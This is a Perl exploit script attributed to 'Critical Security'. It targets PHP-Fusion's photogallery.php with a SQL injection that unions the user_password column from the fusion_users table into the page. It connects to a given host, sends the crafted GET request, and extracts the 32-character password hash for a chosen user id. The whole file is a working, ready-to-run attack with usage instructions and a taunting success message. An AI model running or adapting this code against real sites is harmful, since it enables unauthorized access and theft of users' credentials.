#!/usr/bin/perl
# php-Fusion exploit (work only with magic_quotes=Off)!
# by Critical Security --> www.critical.lt
# Greets: Critical security team (mircia, ld, zauliuz ) and all our fans :*
# coded by JahMan --> tomas at critical.lt
use IO::Socket;

$host = $ARGV[0];
$dir = $ARGV[1];
$userid = $ARGV[2];

if (@ARGV < 3) { 
  print "-- Usage: pfu.pl [host] [path] [user id] --\n";
  exit();
}

$full = $dir;
$full .= "photogallery.php?photo=1247744%27%20union%20select%20null,null,null,null,user_password,null,null,null,null%20from%20fusion_users%20where%20user_id=";
$full .= $userid;
$full .= "/*";         
if ($connect = IO::Socket::INET->new(PeerAddr => "$host",PeerPort => "80",Proto => "tcp",Timeout => "5" ) or die "--Can't connect!--\n") { 
print "-- Connected! --\n";
}
print $connect "GET $full HTTP/1.1\n";
print $connect "Host: $host\n";
print $connect "Connection: close\n\n";
print "-- Sent! --\n";
  
while($recv=<$connect>) {
if ($recv=~m/([a-f0-9]{32})/ ) {
print "-- Uhya!Kids!;) --\n-- User id: $userid --\n-- Pass hash:$1 --\n";
exit();
}
}
print "-- Something wrong:( --\n";